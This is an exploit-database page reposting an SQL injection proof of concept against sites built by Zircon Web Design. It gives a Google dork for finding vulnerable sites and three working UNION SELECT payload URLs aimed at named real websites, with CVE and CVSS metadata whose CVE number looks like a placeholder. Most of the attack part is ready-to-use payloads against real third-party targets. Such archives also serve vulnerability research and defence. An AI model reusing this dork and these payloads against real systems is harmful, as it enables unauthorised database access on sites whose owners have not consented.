Advertisement






Zircon Web Desig - Sql Injection Vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-09-27
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090131

Below is a copy:

Zircon Web Desig - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Zircon Web Desig -  Sql Injection Vulnerability
#Date: 2021-09-25
#Exploit Author: Behrouz Mansoori
#Google Dork: "Website Design and Hosted by Zircon Web Design"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Website Design and Hosted by Zircon Web Design"


### Demo :

http://www.rothesayhouse.com/newpage.php?id=-14%27%20union%20select%201,version(),3,4,5,6,7,8--+

http://www.caslpnl.ca/level3.php?id=-8%27%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13--+

http://www.islandmonuments.com/main_page.php?id=-3%27%20union%20select%201,version(),3,4,5,6,7,8,9--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.